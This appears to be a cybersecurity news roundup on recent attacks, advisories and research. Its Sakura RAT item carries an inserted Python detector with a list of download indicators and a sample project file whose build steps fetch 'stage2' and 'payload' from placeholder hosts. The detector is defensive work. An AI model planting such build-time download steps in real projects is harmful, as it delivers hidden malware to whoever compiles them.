Cybersecurity News: Russian bomber maker popped, vishing targets Salesforce, MS helps out governments

In today’s cybersecurity news…

Ukraine claims cyberattack on Russian bomber maker

Ukraine’s HUR intelligence agency claims it successfully conducted a cyberattack against the Russian state-owned aircraft maker Tupolev, accessing over 4 gigabytes of data with internal communications, meeting notes, and servicing records for strategic bombers. The agency also claimed to have vandalized the company’s website, although it remains down at the time of this recording. This comes days after Ukraine launched a drone offensive against Russian air bases, damaging over 40 long-range bombers. 

(The Record)

Vishing campaign targets Salesforce

Researchers at Google’s Threat Intelligence Group disclosed a recent campaign by the threat group UNC6040 which “demonstrated repeated success in breaching networks by having its operators impersonate IT support personnel in convincing telephone-based social engineering engagements.” These vishing attacks attempt to get staff to load a modified version of Salesforce’s Data Loader, usually used for bulk data access on the platform. The attacks use the tool to gain access to Salesforce environments, exfiltrate data, and then pivot to other platforms with the information gathered. Organizations sometimes received extortion attempts months after a breach, indicating a partnership with another party. The researchers found UNC6040 shows signs that it is aligned with the cybercrime collective The Com. 

(The Hacker News)

Microsoft lends a hand to European governments

Microsoft launched a new program to offer free cybersecurity services to European governments in an effort to bolster their defenses. This program will include intelligence-sharing on emerging threats and help disrupt attacks underway. The program will consist of three elements: increasing AI-based threat intelligence sharing with European governments, making investments to increase resilience to attacks, and expanding partnerships with governments to better detect and dismantle threat networks. 

(Reuters, Microsoft)

Lee Enterprises data breach impacts over 39,000

Back in February, the newspaper group Lee Enterprises suffered a data breach, triggering system outages across much of its network of publications. Now, in a data breach notification filed with Maine’s Attorney General, the company disclosed that the breach resulted in the loss of personally identifiable information on 39,779 individuals, although it was light on what this included. Lee never attributed the attack to a threat group, but the Qilin ransomware group took credit on its leak site, claiming to have stolen 350 gigabytes of data. 

(Bleeping Computer)

Huge thanks to our sponsor, Conveyor

Ever wish you had a teammate that could handle the most annoying parts of customer security reviews?

You know, chasing down SMEs for answers, updating systems, coordinating across teams—all the grunt work nobody wants to do. 

Plus, having to finish the dang questionnaire itself. 

Well. That teammate exists—Conveyor just launched Sue, the first AI Agent for Customer Trust.

Sue really is the dream teammate. She never misses a deadline, answers every customer request from sales, completes every questionnaire and knocks out all the coordination in-between.

Sue handles it all so you don’t have to. Learn more at www.conveyor.com.

Replay attacks bypass deepfake detection

A new paper from Resemble AI and a team of European academic researchers shows a new method for getting around existing audio deepfake detectors, dubbed a replay attack. This involves generating synthetic speech, playing it over speakers, and re-recording it with actual background noise. On top-performing deepfake detection models, this approach increased error rates from 4.7% to 18.2%. Retraining the models on a specific room tone helped a little, bringing the error rate down to 11%. The researchers believe the re-recording removes key artifacts that detection models rely on. 

(Dark Reading)

Sakura RAT malware: it’s a trap

Researchers at Sophos found a piece of malware hosted on GitHub called Sakura RAT. Initially this appeared broken, but the code includes a “PreBuild” event that downloads an additional backdoor while compiling. Tracing an email found in the malware, the researchers discovered 133 additional repositories hosting other software with similar silent downloads, ranging from game cheats to hacking tools and crypto utilities. To give an illusion that these projects are actively maintained, the threat actors auto-generated commits with GitHub Actions, following a strict pattern across projects that shows significant coordination. The payloads varied from backdoors to AsyncRAT and Lumma Stealer.
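The build-time download trick described above is cheap to check for before compiling a project pulled from an untrusted repository. The following is an added example, not Sophos’s tooling or anything from the repositories in the story: it parses MSBuild project XML and flags PreBuildEvent/PostBuildEvent text and Exec task commands that contain download indicators. The indicator list and the two sample project files are constructed for the example; the hostnames in them are placeholders.

```python
"""Flag MSBuild build events that fetch remote content.

Added example (not Sophos's code): scans .csproj/.vbproj XML for
<PreBuildEvent>/<PostBuildEvent> text and <Exec Command="..."> tasks whose
command line looks like a network fetch. Sample project files are constructed
inline so the script runs offline.
"""
import sys
import xml.etree.ElementTree as ET

# Constructed indicator list: substrings that commonly mean "download something
# during the build". Extend for your environment; compared case-insensitively.
DOWNLOAD_INDICATORS = (
    "http://", "https://", "curl ", "wget ", "invoke-webrequest", "iwr ",
    "downloadfile", "downloadstring", "certutil", "bitsadmin",
)


def _local(tag):
    """Drop an XML namespace prefix: '{ns}PreBuildEvent' -> 'PreBuildEvent'."""
    return tag.rsplit("}", 1)[-1]


def find_suspicious_build_steps(project_xml):
    """Return [(element_name, command), ...] for build steps with download indicators."""
    root = ET.fromstring(project_xml)
    hits = []
    for el in root.iter():  # document order, so hits come back in file order
        name = _local(el.tag)
        if name in ("PreBuildEvent", "PostBuildEvent"):
            cmd = (el.text or "").strip()
        elif name == "Exec":
            cmd = el.attrib.get("Command", "").strip()
        else:
            continue
        lowered = cmd.lower()
        if any(ind in lowered for ind in DOWNLOAD_INDICATORS):
            hits.append((name, cmd))
    return hits


def scan_file(path):
    """Convenience wrapper for a project file on disk."""
    with open(path, encoding="utf-8") as fh:
        return find_suspicious_build_steps(fh.read())


# Constructed sample: a harmless pre-build step that only echoes a message.
BENIGN_CSPROJ = """<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <PreBuildEvent>echo Building $(ProjectName)</PreBuildEvent>
  </PropertyGroup>
</Project>"""

# Constructed sample: a pre-build event and an Exec task that both fetch a
# remote file before the code is even compiled. Hostnames are placeholders.
SUSPICIOUS_CSPROJ = """<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <OutputType>WinExe</OutputType>
    <PreBuildEvent>powershell -c "Invoke-WebRequest http://example.invalid/stage2 -OutFile stage2.exe"</PreBuildEvent>
  </PropertyGroup>
  <Target Name="Fetch" BeforeTargets="Build">
    <Exec Command="curl -s https://example.invalid/payload -o p.bin" />
  </Target>
</Project>"""


if __name__ == "__main__":
    # Usage: python scan_build_events.py [project.csproj ...]
    # With no arguments, runs against the constructed samples.
    if len(sys.argv) > 1:
        for p in sys.argv[1:]:
            for name, cmd in scan_file(p):
                print(f"{p}: {name}: {cmd}")
    else:
        print("benign:", find_suspicious_build_steps(BENIGN_CSPROJ))
        print("suspicious:", find_suspicious_build_steps(SUSPICIOUS_CSPROJ))
```

The check is deliberately a substring scan rather than a full command parser: the goal is to surface any build step that reaches the network so a human can look at it before the first build, since MSBuild will run these commands as soon as the project is compiled in Visual Studio or with `dotnet build`.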

(Infosecurity Magazine)

Booking.com, Booking [dot] spoofed

Researchers at Cofense Intelligence spotted a phishing campaign spoofing Booking.com that has been active since November 2024. This campaign emails hotel staff, asking them to respond to guest-related queries, often with time-sensitive lures. These messages use ClickFix to pose as a CAPTCHA, ultimately being used to start a malware download and install a RAT or infostealer. The researchers also found the campaign using cookie consent banners and Cloudflare-style site walls as another means to use ClickFix to download a payload. 

(Infosecurity Magazine)

FBI warns about NFT scheme

A new advisory from the FBI warns about a new NFT airdrop scheme operating on the Hedera Hashgraph network. Threat actors target victims by sending unsolicited NFTs to a wallet, along with memos asking them to click a URL to claim a reward, but instead send them to phishing pages that ask for wallet seed phrases and passwords. This campaign also uses standard phishing emails, social media ads, and fake sites to draw in victims. The FBI advises verifying any NFT drops from official sources rather than emails. If you’re not familiar, hashgraph is a next-generation distributed ledger introduced in 2018, similar to a blockchain but based on a protocol aimed at speed, scale, and energy efficiency. 

(Bleeping Computer)

Rich Stroffolino
Rich Stroffolino is a podcaster, editor, and writer based out of Cleveland, Ohio. Since 2015, he's worked in technology news podcasting and media. He dreams of someday writing the oral history of Transmeta.